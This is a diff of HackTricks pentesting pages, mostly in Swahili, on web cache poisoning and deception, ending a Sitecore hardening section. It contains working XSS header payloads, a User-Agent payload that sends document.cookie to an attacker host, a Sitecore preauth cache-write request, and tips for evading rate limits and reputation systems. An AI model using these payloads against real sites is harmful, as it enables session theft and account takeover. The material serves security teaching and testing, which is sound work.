- ItemService probing: spikes ya maswali ya wildcard kwa `/sitecore/api/ssc`, `TotalCount` kubwa na `Results` tupu.
- Deserialization attempts: `EditHtml.aspx` ikifuatiwa na `FixHtml.aspx?hdl=...` na base64 kubwa isiyo ya kawaida katika vikambu vya HTML.
## Kuimarisha usalama
- Apply Sitecore patches KB1003667 and KB1003734; gate/disable preauth XAML handlers or add strict validation; fuatilia na weka ratelimit `/-/xaml/`.
- Ondoa/ibadilishe BinaryFormatter; zuia upatikanaji wa convertToRuntimeHtml au tekeleza uthibitisho mkali upande wa server kwa mtiririko wa uhariri wa HTML.
- Funga `/sitecore/api/ssc` kwa loopback au roles zilizo authenticated; epuka mifumo ya impersonation zinazoweza leak za side channels zenye msingi wa `TotalCount`.
- Leteza MFA/least privilege kwa watumiaji wa Content Editor; hakiki CSP ili kupunguza athari ya JS steering kutoka cache poisoning.
## References
- [watchTowr Labs Cache Me If You Can: Sitecore Experience Platform Cache Poisoning to RCE](https://labs.watchtowr.com/cache-me-if-you-can-sitecore-experience-platform-cache-poisoning-to-rce/)
- [Sitecore KB1003667 Security patch](https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667)
- [Sitecore KB1003734 Security patch](https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003734)
{{#include ../../../banners/hacktricks-training.md}}

215
src/pentesting-web/cache-deception/README.md
View File

@ -2,74 +2,75 @@
{{#include ../../banners/hacktricks-training.md}}
## Tofauti
## The difference
> **Tofauti kati ya web cache poisoning na web cache deception ni ipi?**
> **What is the difference between web cache poisoning and web cache deception?**
>
> - Katika **web cache poisoning**, mshambuliaji anasababisha programu kuhifadhi maudhui mabaya katika cache, na maudhui haya yanatolewa kutoka kwenye cache kwa watumiaji wengine wa programu.
> - Katika **web cache deception**, mshambuliaji anasababisha programu kuhifadhi maudhui nyeti yanayomilikiwa na mtumiaji mwingine katika cache, na mshambuliaji kisha anapata maudhui haya kutoka kwenye cache.
> - In **web cache poisoning**, mshambuliaji husababisha programu kuhifadhi baadhi ya maudhui hatarishi katika cache, na maudhui haya hutolewa kutoka cache kwa watumiaji wengine wa programu.
> - In **web cache deception**, mshambuliaji husababisha programu kuhifadhi maudhui nyeti ya mtumiaji mwingine katika cache, kisha mshambuliaji hurudisha maudhui haya kutoka kwenye cache.
## Cache Poisoning
Cache poisoning inalenga kubadilisha cache ya upande wa mteja ili kulazimisha wateja kupakua rasilimali ambazo hazitarajiwa, sehemu, au chini ya udhibiti wa mshambuliaji. Kiwango cha athari kinategemea umaarufu wa ukurasa ulioathiriwa, kwani jibu lililochafuliwa linatolewa pekee kwa watumiaji wanaotembelea ukurasa wakati wa kipindi cha uchafuzi wa cache.
Cache poisoning inalenga kuingilia cache ya upande wa mteja ili kumlazimisha mteja kupakia rasilimali zisizotarajiwa, zisizokamilika, au zilizo chini ya udhibiti wa mshambuliaji. Ukubwa wa athari unategemea maarufu ya ukurasa uliokumba, kwani majibu yaliyochafu hutolewa kwa watumiaji wanaotembelea ukurasa wakati wa kipindi cha uchafu wa cache pekee.
Utekelezaji wa shambulio la cache poisoning unajumuisha hatua kadhaa:
Utekelezaji wa shambulio la cache poisoning unahusisha hatua kadhaa:
1. **Utambuzi wa Ingizo Lisilo na Funguo**: Hizi ni vigezo ambavyo, ingawa havihitajiki kwa ombi kuhifadhiwa kwenye cache, vinaweza kubadilisha jibu linalotolewa na seva. Kutambua vigezo hivi ni muhimu kwani vinaweza kutumika kubadilisha cache.
2. **Kutatua Vigezo Visivyo na Funguo**: Baada ya kutambua vigezo visivyo na funguo, hatua inayofuata ni kubaini jinsi ya kutumia vibaya vigezo hivi ili kubadilisha jibu la seva kwa njia inayomfaidi mshambuliaji.
3. **Kuhakikisha Jibu Lililochafuliwa Linahifadhiwa**: Hatua ya mwisho ni kuhakikisha kwamba jibu lililobadilishwa linahifadhiwa kwenye cache. Kwa njia hii, mtumiaji yeyote anayepata ukurasa ulioathiriwa wakati cache imechafuliwa atapata jibu lililochafuliwa.
1. **Kuainisha vigezo visivyotumika kama key**: Hii ni vigezo ambavyo, ingawa havihitajiki kwa ombi kuhifadhiwa kwenye cache, vinaweza kubadilisha majibu yanayotolewa na server. Kuainisha vigezo hivi ni muhimu kwa sababu vinaweza kutumiwa kuathiri cache.
2. **Kutumia vigezo visivyo na key**: Baada ya kuainisha vigezo visivyo na key, hatua inayofuata ni kubaini jinsi ya kutumia vibaya vigezo hivi ili kubadilisha majibu ya server kwa njia inayomfaa mshambuliaji.
3. **Kuhakikisha Majibu yaliyochafu yamehifadhiwa kwenye cache**: Hatua ya mwisho ni kuhakikisha kuwa majibu yaliyobadilishwa yamehifadhiwa kwenye cache. Kwa njia hiyo, mtumiaji yeyote anayeingia ukurasa uliokumba wakati cache imechafuka atapokea jibu lililochafuka.
### Ugunduzi: Angalia vichwa vya HTTP
### Discovery: Check HTTP headers
Kawaida, wakati jibu lime **hifadhiwa kwenye cache** kutakuwa na **kichwa kinachoonyesha hivyo**, unaweza kuangalia vichwa gani unapaswa kuzingatia katika chapisho hili: [**HTTP Cache headers**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
Kawaida, wakati jibu lilihifadhiwa kwenye cache kutakuwa na kichwa kinachoonyesha hivyo; unaweza kuangalia ni vichwa gani vinavyostahili kuzingatiwa katika chapisho hili: [**HTTP Cache headers**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
### Ugunduzi: Kihesabu makosa ya caching
### Discovery: Caching error codes
Ikiwa unafikiria kwamba jibu linahifadhiwa kwenye cache, unaweza kujaribu **kutuma maombi yenye kichwa kibaya**, ambacho kinapaswa kujibiwa kwa **kodi ya hali 400**. Kisha jaribu kufikia ombi kawaida na ikiwa **jibu ni kodi ya hali 400**, unajua ni hatari (na unaweza hata kufanya DoS).
Iwapo unafikiri jibu linawekwa kwenye cache, unaweza kujaribu kutuma maombi yenye header mbaya, ambayo yanapaswa kurejelewa na status code 400. Kisha jaribu kufikia ombi kawaida na ikiwa jibu ni status code 400, unajua ni vunja (na hata unaweza kutekeleza DoS).
You can find more options in:
Unaweza kupata chaguzi zaidi katika:
{{#ref}}
cache-poisoning-to-dos.md
{{#endref}}
Hata hivyo, kumbuka kwamba **wakati mwingine aina hizi za kodi za hali hazihifadhiwi** hivyo jaribio hili linaweza kuwa si la kuaminika.
Hata hivyo, kumbuka kwamba wakati mwingine aina hizi za status codes hazihifadhiwi kwenye cache, kwa hivyo jaribio hili halina uhakika.
### Ugunduzi: Tambua na tathmini vigezo visivyo na funguo
### Discovery: Identify and evaluate unkeyed inputs
Unaweza kutumia [**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) ili **kufanya brute-force vigezo na vichwa** ambavyo vinaweza kuwa **vinabadilisha jibu la ukurasa**. Kwa mfano, ukurasa unaweza kuwa unatumia kichwa `X-Forwarded-For` kuonyesha mteja kupakua script kutoka pale:
Unaweza kutumia [**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) kufanyia brute-force parameters na headers ambazo zinaweza kubadilisha jibu la ukurasa. Kwa mfano, ukurasa unaweza kutumia header `X-Forwarded-For` kuonyesha mteja kupakia script kutoka huko:
```html
<script type="text/javascript" src="//<X-Forwarded-For_value>/resources/js/tracking.js"></script>
```
### Elicit a harmful response from the back-end server
### Sababisha jibu hatari kutoka kwa back-end server
With the parameter/header identified check how it is being **sanitised** and **where** is it **getting reflected** or affecting the response from the header. Can you abuse it anyway (perform an XSS or load a JS code controlled by you? perform a DoS?...)
Ukibaini parameter/header, angalia jinsi inavyosafishwa na wapi inarejea au inavyoathiri response kutoka kwa header. Je, unaweza kuitumia vibaya (perform an XSS au load JS unayodhibiti? perform DoS?...)
### Get the response cached
### Pata response ikahifadhiwa kwenye cache
Once you have **identified** the **page** that can be abused, which **parameter**/**header** to use and **how** to **abuse** it, you need to get the page cached. Depending on the resource you are trying to get in the cache this could take some time, you might need to be trying for several seconds.
Mara baada ya kuwa umeya **baini** **page** inayoweza kutumika vibaya, ni **parameter**/**header** gani ya kutumia na **jinsi** ya kuiabusa, unahitaji kuhakikisha ukurasa umehifadhiwa kwenye cache. Kulingana na rasilimali unayotaka kuweka kwenye cache, inaweza kuchukua muda; huenda ukahitaji kujaribu kwa sekunde kadhaa.
The header **`X-Cache`** in the response could be very useful as it may have the value **`miss`** when the request wasn't cached and the value **`hit`** when it is cached.\
The header **`Cache-Control`** is also interesting to know if a resource is being cached and when will be the next time the resource will be cached again: `Cache-Control: public, max-age=1800`
Header **`X-Cache`** katika response inaweza kuwa muhimu kwani inaweza kuwa na thamani **`miss`** wakati request haikuwekwa kwenye cache na thamani **`hit`** wakati imehifadhiwa.\
Header **`Cache-Control`** pia ni muhimu kujua ikiwa rasilimali inawekwa kwenye cache na ni lini itahifadhiwa tena: `Cache-Control: public, max-age=1800`
Another interesting header is **`Vary`**. This header is often used to **indicate additional headers** that are treated as **part of the cache key** even if they are normally unkeyed. Therefore, if the user knows the `User-Agent` of the victim he is targeting, he can poison the cache for the users using that specific `User-Agent`.
Header nyingine ya kuvutia ni **`Vary`**. Header hii mara nyingi hutumika kuonyesha **headers za ziada** zinazochukuliwa kama **sehemu ya cache key** hata kama kawaida hazizingatiiwi kama key. Kwa hivyo, ikiwa mshambuliaji anajua `User-Agent` ya mwathiriwa anayemlenga, anaweza poison the cache kwa watumiaji wanaotumia `User-Agent` hiyo.
One more header related to the cache is **`Age`**. It defines the times in seconds the object has been in the proxy cache.
Header nyingine inayohusiana na cache ni **`Age`**. Inabainisha muda kwa sekunde ambao kitu kimekuwa katika proxy cache.
When caching a request, be **careful with the headers you use** because some of them could be **used unexpectedly** as **keyed** and the **victim will need to use that same header**. Always **test** a Cache Poisoning with **different browsers** to check if it's working.
Unapohifadhi request kwenye cache, kuwa **makini na headers unazotumia** kwa sababu baadhi yao yanaweza **kutumika bila kutarajiwa** kama **keyed** na **mwathiriwa atahitaji kutumia header hiyo hiyo**. Daima **jaribu** Cache Poisoning kwa **browsers tofauti** ili uhakikishe inafanya kazi.
## Exploiting Examples
## Mifano ya Exploiting
### Easiest example
### Mfano rahisi zaidi
A header like `X-Forwarded-For` is being reflected in the response unsanitized.\
You can send a basic XSS payload and poison the cache so everybody that accesses the page will be XSSed:
Header kama `X-Forwarded-For` inarejea kwenye response bila kusafishwa.\
Unaweza kutuma payload ya msingi ya XSS na poison the cache ili kila mtu anayefungua ukurasa apate XSS:
```html
GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: a."><script>alert(1)</script>"
```
_Note that this will poison a request to `/en?region=uk` not to `/en`_
_Kumbuka kwamba hii itapoison ombi kwa `/en?region=uk` si kwa `/en`_
### Cache poisoning to DoS
@ -80,52 +81,54 @@ cache-poisoning-to-dos.md
### Cache poisoning through CDNs
In **[this writeup](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html)** it's explained the following simple scenario:
Katika **[this writeup](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html)** inaelezea tukio rahisi lifuatalo:
- CDN itachache chochote chini ya `/share/`
- CDN HAIta decode wala normalize `%2F..%2F`, hivyo, inaweza kutumika kama **path traversal kuaccess maeneo mengine nyeti ambayo yatakahifadhiwa** kama `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123`
- Web server ITAdecode na normalize `%2F..%2F`, na itajibu na `/api/auth/session`, ambayo **ina token ya uthibitishaji**.
- CDN itakayocache chochote chini ya `/share/`
- CDN haitadecode wala haitanormalize `%2F..%2F`, kwa hivyo inaweza kutumika kama **path traversal to access other sensitive locations that will be cached** kama `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123`
- Server ya wavuti WILL decode and normalize `%2F..%2F`, na itajibu na `/api/auth/session`, ambayo **ina auth token**.
### Using web cache poisoning to exploit cookie-handling vulnerabilities
Cookies pia zinaweza kuakisiwa kwenye jibu la ukurasa. Ikiwa unaweza kuitumia kuleta XSS kwa mfano, unaweza kuwa na uwezo wa kutumia XSS katika wateja kadhaa wanaopakia jibu la cache lililo na uharibifu.
Cookies pia zinaweza kuonekana katika response ya ukurasa. Ikiwa unaweza kuabuse hilo kusababisha XSS, kwa mfano, unaweza ku-exploit XSS katika clients kadhaa zinazopakia malicious cache response.
```html
GET / HTTP/1.1
Host: vulnerable.com
Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"
```
Kumbuka kwamba ikiwa cookie iliyo hatarini inatumika sana na watumiaji, maombi ya kawaida yatakuwa yakisafisha cache.
Kumbuka kwamba ikiwa cookie iliyo hatarini inatumiwa mara kwa mara na watumiaji, maombi ya kawaida yataosha cache.
### Kutengeneza tofauti na vikwazo, urekebishaji na nukta <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
### Generating discrepancies with delimiters, normalization and dots <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
Angalia:
{{#ref}}
cache-poisoning-via-url-discrepancies.md
{{#endref}}
### Kuambukiza cache kwa kutumia njia ya kupita ili kuiba funguo za API <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
[**Andiko hili linaelezea**](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html) jinsi ilivyowezekana kuiba funguo za OpenAI API kwa URL kama `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123` kwa sababu chochote kinacholingana na `/share/*` kitahifadhiwa bila Cloudflare kurekebisha URL, ambayo ilifanyika wakati ombi lilipofika kwenye seva ya wavuti.
Hii pia inaelezwa vizuri zaidi katika:
{{#ref}}
cache-poisoning-via-url-discrepancies.md
{{#endref}}
### Kutumia vichwa vingi ili kutumia udhaifu wa kuambukiza cache ya wavuti <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
### Cache poisoning with path traversal to steal API key <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
Wakati mwingine utahitaji **kutumia ingizo kadhaa zisizo na funguo** ili uweze kutumia cache. Kwa mfano, unaweza kupata **Open redirect** ikiwa utaweka `X-Forwarded-Host` kwa kikoa kinachodhibitiwa na wewe na `X-Forwarded-Scheme` kuwa `http`. **Ikiwa** **seva** in **peleka** maombi yote ya **HTTP** **kwenda HTTPS** na kutumia kichwa `X-Forwarded-Scheme` kama jina la kikoa kwa ajili ya uelekeo. Unaweza kudhibiti mahali ukurasa unapoelekezwa na uelekeo.
[**This writeup explains**](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html) jinsi ilivyowezekana kuiba OpenAI API key kwa URL kama `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123` kwa sababu chochote kinacholingana na `/share/*` kitabebwa bila Cloudflare normalising the URL, ambayo ilifanywa wakati ombi lilipofika kwenye web server.
Hii pia imeelezewa vyema katika:
{{#ref}}
cache-poisoning-via-url-discrepancies.md
{{#endref}}
### Using multiple headers to exploit web cache poisoning vulnerabilities <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
Wakati mwingine utahitaji **exploit several unkeyed inputs** ili uweze abuse cache. Kwa mfano, unaweza kupata an **Open redirect** ikiwa utaweka `X-Forwarded-Host` kwa domain unayodhibiti na `X-Forwarded-Scheme` kuwa `http`. Ikiwa **server** inafanya **forwarding** maombi yote ya **HTTP** **to HTTPS** na inatumia header `X-Forwarded-Scheme` kama jina la domain kwa redirect, unaweza kudhibiti wapi ukurasa unaelekezwa na redirect.
```html
GET /resources/js/tracking.js HTTP/1.1
Host: acc11fe01f16f89c80556c2b0056002e.web-security-academy.net
X-Forwarded-Host: ac8e1f8f1fb1f8cb80586c1d01d500d3.web-security-academy.net/
X-Forwarded-Scheme: http
```
### Kutumia kwa kutumia kichwa kidogo cha `Vary`
### Kutumia `Vary`header iliyopunguzwa
Ikiwa umebaini kwamba kichwa cha **`X-Host`** kinatumika kama **jina la kikoa kupakia rasilimali ya JS** lakini kichwa cha **`Vary`** katika jibu kinaonyesha **`User-Agent`**. Basi, unahitaji kutafuta njia ya kutoa User-Agent ya mwathirika na kuharibu cache kwa kutumia user agent hiyo:
Ikiwa umegundua kwamba **`X-Host`** header inatumika kama **jina la domaini kupakia rasilimali ya JS** lakini header ya **`Vary`** katika jibu inaonyesha **`User-Agent`**. Kisha, unahitaji kupata njia ya exfiltrate `User-Agent` ya mwanaathirika na poison the cache ukitumia `User-Agent` huo:
```html
GET / HTTP/1.1
Host: vulnerbale.net
@ -134,7 +137,7 @@ X-Host: attacker.com
```
### Fat Get
Tuma ombi la GET na ombi katika URL na katika mwili. Ikiwa seva ya wavuti inatumia ile kutoka kwa mwili lakini seva ya cache inahifadhi ile kutoka kwa URL, mtu yeyote anayefikia URL hiyo atatumia parameter kutoka kwa mwili. Kama ilivyo katika udhaifu ambao James Kettle alipata kwenye tovuti ya Github:
Tuma GET request yenye request katika URL na katika body. Ikiwa web server inatumia ile kutoka body lakini cache server inahifadhi ile kutoka URL, yeyote anayefikia URL hiyo atatumia parameter kutoka body. Kama vile vuln James Kettle alipogundua kwenye Github website:
```
GET /contact/report-abuse?report=albinowax HTTP/1.1
Host: github.com
@ -143,103 +146,120 @@ Content-Length: 22
report=innocent-victim
```
There it a portswigger lab about this: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get)
Kuna labu ya PortSwigger kuhusu hili: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get)
### Parameter Cloacking
Kwa mfano, inawezekana kutenganisha **parameters** katika seva za ruby kwa kutumia herufi **`;`** badala ya **`&`**. Hii inaweza kutumika kuweka thamani za parameters zisizo na ufunguo ndani ya zile zenye ufunguo na kuzitumia vibaya.
For example it's possible to separate **parameters** in ruby servers using the char **`;`** instead of **`&`**. This could be used to put unkeyed parameters values inside keyed ones and abuse them.
Portswigger lab: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking)
### Exploiting HTTP Cache Poisoning by abusing HTTP Request Smuggling
Jifunze hapa jinsi ya kutekeleza [Cache Poisoning attacks by abusing HTTP Request Smuggling](../http-request-smuggling/index.html#using-http-request-smuggling-to-perform-web-cache-poisoning).
Jifunze hapa kuhusu jinsi ya kufanya [Cache Poisoning attacks by abusing HTTP Request Smuggling](../http-request-smuggling/index.html#using-http-request-smuggling-to-perform-web-cache-poisoning).
### Automated testing for Web Cache Poisoning
### Upimaji wa otomatiki kwa Web Cache Poisoning
The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner) can be used to automatically test for web cache poisoning. It supports many different techniques and is highly customizable.
The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner) inaweza kutumiwa kupima otomatiki kwa web cache poisoning. Inasaidia mbinu nyingi tofauti na inaweza kubinafsishwa kwa kiasi kikubwa.
Example usage: `wcvs -u example.com`
Mfano wa matumizi: `wcvs -u example.com`
### Header-reflection XSS + CDN/WAF-assisted cache seeding (User-Agent, auto-cached .js)
Mfano huu wa kweli unachanganya primitive ya reflection inayotegemea kichwa na tabia ya CDN/WAF ili kwa uhakika kuharibu HTML iliyohifadhiwa inayotolewa kwa watumiaji wengine:
Mfano huu wa ulimwengu halisi unaunganisha primitive ya header-based reflection na tabia ya CDN/WAF ili kwa kuaminika ku-poison HTML iliyohifadhiwa (cached) inayotumiwa kwa watumiaji wengine:
- HTML kuu ilireflect ombi la kichwa kisichoaminika (mfano, `User-Agent`) katika muktadha wa kutekeleza.
- CDN iliondoa vichwa vya cache lakini cache ya ndani/origini ilikuwepo. CDN pia ilihifadhi ombi moja kwa moja ya ombi yanayomalizika kwa nyongeza za statiki (mfano, `.js`), wakati WAF ilitumia ukaguzi dhaifu wa maudhui kwa GETs za mali za statiki.
- Tabia za mtiririko wa ombi ziliruhusu ombi la njia ya `.js` kuathiri ufunguo/variant wa cache uliohitajika kwa HTML kuu inayofuata, ikiruhusu XSS ya mtumiaji-mwingine kupitia reflection ya kichwa.
- HTML kuu iliakisi header ya request isiyoaminika (kwa mfano, `User-Agent`) ndani ya executable context.
- CDN iliondoa cache headers lakini kulikuwepo cache ya internal/origin. CDN pia ili-auto-cache requests zinazomalizika kwa extensions za static (kwa mfano, `.js`), wakati WAF ilitumia ukaguzi mdogo wa maudhui kwa GETs za static assets.
- Mabadiliko ya mtiririko wa requests yaliwezesha request kwa njia ya `.js` kuathiri cache key/variant iliyotumika kwa HTML kuu iliyofuata, hivyo kuwezesha cross-user XSS kupitia header reflection.
Mapishi ya vitendo (iliyoshuhudiwa katika CDN/WAF maarufu):
Mapishi ya vitendo (iliyoshuhudiwa kwenye CDN/WAF maarufu):
1) Kutoka kwa IP safi (epuka kupunguzwa kwa sifa za awali), weka `User-Agent` mbaya kupitia kivinjari au Burp Proxy Match & Replace.
2) Katika Burp Repeater, andaa kundi la maombi mawili na tumia "Send group in parallel" (mode ya pakiti moja inafanya kazi bora):
- Ombi la kwanza: GET rasilimali ya njia ya `.js` kwenye asili hiyo hiyo huku ukituma `User-Agent` wako mbaya.
- Mara moja baada ya: GET ukurasa kuu (`/`).
3) Mbio za urambazaji za CDN/WAF pamoja na `.js` iliyohifadhiwa moja kwa moja mara nyingi huzaa variant ya HTML iliyoharibiwa ambayo kisha inatolewa kwa wageni wengine wanaoshiriki hali sawa za ufunguo wa cache (mfano, vipimo sawa vya `Vary` kama `User-Agent`).
1) Kutoka IP safi (epuka prior reputation-based downgrades), weka `User-Agent` yenye uhasama kupitia browser au Burp Proxy Match & Replace.
2) Katika Burp Repeater, andaa kundi la requests mbili na tumia "Send group in parallel" (single-packet mode works best):
- Request ya kwanza: GET njia ya rasilimali ya `.js` kwenye origin ileile huku ukituma `User-Agent` yako yenye uhasama.
- Mara moja baada yake: GET ukurasa mkuu (`/`).
3) Mbio za routing za CDN/WAF pamoja na `.js` iliyohifadhiwa kwa otomatiki mara nyingi huzaa variant ya HTML iliyopoisona katika cache ambayo kisha hutumika kwa wageni wengine wanaoshiriki masharti yale yale ya cache key (kwa mfano, same `Vary` dimensions like `User-Agent`).
Mfano wa payload ya kichwa (kuondoa vidakuzi visivyo na HttpOnly):
Mfano wa header payload (to exfiltrate non-HttpOnly cookies):
```
User-Agent: Mo00ozilla/5.0</script><script>new Image().src='https://attacker.oastify.com?a='+document.cookie</script>"
```
Operational tips:
- CDNs nyingi huficha vichwa vya cache; uchafuzi unaweza kuonekana tu kwenye mizunguko ya kusasisha ya masaa mengi. Tumia IP nyingi za mtazamo na punguza kasi ili kuepuka mipaka ya kiwango au vichocheo vya sifa.
- Kutumia IP kutoka wingu la CDN yenyewe wakati mwingine huongeza uthabiti wa routing.
- Ikiwa CSP kali ipo, hii bado inafanya kazi ikiwa kutafakari kunatekelezwa katika muktadha wa HTML kuu na CSP inaruhusu utekelezaji wa ndani au inakwepa kwa muktadha.
- CDNs nyingi huficha cache headers; poisoning inaweza kuonekana tu kwenye mizunguko ya refresh ya masaa mengi. Tumia multiple vantage IPs na throttle ili kuepuka rate-limit au reputation triggers.
- Kutumia IP kutoka cloud ya CDN mwenyewe wakati mwingine huboresha routing consistency.
- Ikiwa kuna CSP kali, bado inafanya kazi ikiwa reflection inaendeshwa katika main HTML context na CSP inaruhusu inline execution au inapitiwa na context.
Impact:
- Ikiwa kuki za kikao si `HttpOnly`, ATO isiyo na bonyeza moja inawezekana kwa kuhamasisha kwa wingi `document.cookie` kutoka kwa watumiaji wote wanaopatiwa HTML iliyochafuliwa.
- Ikiwa session cookies si `HttpOnly`, zero-click ATO inawezekana kwa mass-exfiltrating `document.cookie` kutoka kwa watumiaji wote wanaopokelewa poisoned HTML.
Defenses:
- Acha kutafakari vichwa vya ombi ndani ya HTML; encode muktadha kwa ukali ikiwa haiwezekani. Patanisha sera za cache za CDN na asili na kuepuka kutofautiana kwenye vichwa visivyoaminika.
- Hakikisha WAF inatumika ukaguzi wa maudhui kwa usawa kwa maombi ya `.js` na njia za statiki.
- Weka `HttpOnly` (na `Secure`, `SameSite`) kwenye kuki za kikao.
- Acha ku-reflect request headers ndani ya HTML; context-encode kwa ukali ikiwa haiwezi kuepukika. Linganisha sera za cache za CDN na origin na epuka ku-vary kwa headers zisizoaminika.
- Hakikisha WAF inatumia content inspection kwa uthabiti kwa `.js` requests na static paths.
- Weka `HttpOnly` (na `Secure`, `SameSite`) kwenye session cookies.
## Vulnerable Examples
### Sitecore preauth HTML cache poisoning (unsafe XAML Ajax reflection)
Mfumo maalum wa Sitecore huruhusu uandishi usioidhinishwa kwenye HtmlCache kwa kutumia vibaya preauth XAML handlers na AjaxScriptManager reflection. Wakati handler ya `Sitecore.Shell.Xaml.WebControl` inafikiwa, `xmlcontrol:GlobalHeader` (iliyotokana na `Sitecore.Web.UI.WebControl`) inapatikana na wito wa reflective ufuatao unaruhusiwa:
```
POST /-/xaml/Sitecore.Shell.Xaml.WebControl
Content-Type: application/x-www-form-urlencoded
__PARAMETERS=AddToCache("key","<html>…payload…</html>")&__SOURCE=ctl00_ctl00_ctl05_ctl03&__ISEVENT=1
```
Hii inaandika HTML yoyote chini ya cache key iliyochaguliwa na mshambuliaji, ikiruhusu precise poisoning mara cache keys zinapojulikana.
For full details (cache key construction, ItemService enumeration and a chained postauth deserialization RCE):
{{#ref}}
../../network-services-pentesting/pentesting-web/sitecore/README.md
{{#endref}}
## Mifano Inayoweza Kuathiriwa
### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577))
ATS ilituma kipande ndani ya URL bila kukiondoa na kuunda ufunguo wa cache kwa kutumia tu mwenyeji, njia na swali (ikikosa kipande). Hivyo ombi `/#/../?r=javascript:alert(1)` lilitumwa kwa backend kama `/#/../?r=javascript:alert(1)` na ufunguo wa cache haukuwa na mzigo ndani yake, tu mwenyeji, njia na swali.
ATS ilituma fragment ndani ya URL bila kuiondoa na ikatengeneza cache key ikitumia tu host, path na query (ikisingiza fragment). Hivyo ombi `/#/../?r=javascript:alert(1)` lilitumwa kwa backend kama `/#/../?r=javascript:alert(1)` na cache key haikuwa na payload ndani yake, ilikuwa na host, path na query tu.
### GitHub CP-DoS
Kutuma thamani mbaya katika kichwa cha aina ya maudhui kulisababisha jibu la 405 lililohifadhiwa. Ufunguzi wa cache ulijumuisha kuki hivyo ilikuwa inawezekana kushambulia watumiaji wasio na uthibitisho.
Kutuma thamani mbaya kwenye content-type header ilisababisha response ya 405 iliyohifadhiwa (cached). Cache key ilijumuisha cookie hivyo ilikuwa inawezekana kushambulia tu unauth users.
### GitLab + GCP CP-DoS
GitLab inatumia ndoo za GCP kuhifadhi maudhui ya statiki. **Ndoo za GCP** zinasaidia **kichwa `x-http-method-override`**. Hivyo ilikuwa inawezekana kutuma kichwa `x-http-method-override: HEAD` na kuchafua cache ili irejeshe mwili wa jibu tupu. Pia inaweza kusaidia njia `PURGE`.
GitLab inatumia GCP buckets kuhifadhi static content. **GCP Buckets** zinaunga mkono header **`x-http-method-override`**. Kwa hivyo ilikuwa inawezekana kutuma header `x-http-method-override: HEAD` na poison the cache ili irudishe response body tupu. Pia inaweza kusaidia method `PURGE`.
### Rack Middleware (Ruby on Rails)
Katika programu za Ruby on Rails, middleware ya Rack mara nyingi hutumiwa. Kusudi la msimbo wa Rack ni kuchukua thamani ya kichwa cha **`x-forwarded-scheme`** na kuipatia kama mpango wa ombi. Wakati kichwa `x-forwarded-scheme: http` kinatumwa, uelekeo wa 301 unafanyika kwa eneo hilo hilo, huenda kusababisha Kukataliwa kwa Huduma (DoS) kwa rasilimali hiyo. Zaidi ya hayo, programu inaweza kutambua kichwa cha `X-forwarded-host` na kuwarudisha watumiaji kwa mwenyeji uliotajwa. Tabia hii inaweza kusababisha kupakia faili za JavaScript kutoka kwa seva ya mshambuliaji, ikileta hatari ya usalama.
Katika applications za Ruby on Rails, Rack middleware mara nyingi hutumika. Kusudi la code ya Rack ni kuchukua thamani ya header **`x-forwarded-scheme`** na kuiweka kama scheme ya request. Wakati header `x-forwarded-scheme: http` inapotumwa, hutokea redirect ya 301 kwenda eneo lile lile, jambo ambalo linaweza kusababisha Denial of Service (DoS) kwa rasilimali hiyo. Zaidi ya hayo, application inaweza kutambua header `X-forwarded-host` na kuwarudisha watumiaji kwenye host iliyotajwa. Tabia hii inaweza kusababisha kupakia kwa faili za JavaScript kutoka kwenye server ya mshambuliaji, na hivyo kuleta hatari ya usalama.
### 403 na Ndoo za Hifadhi
### 403 and Storage Buckets
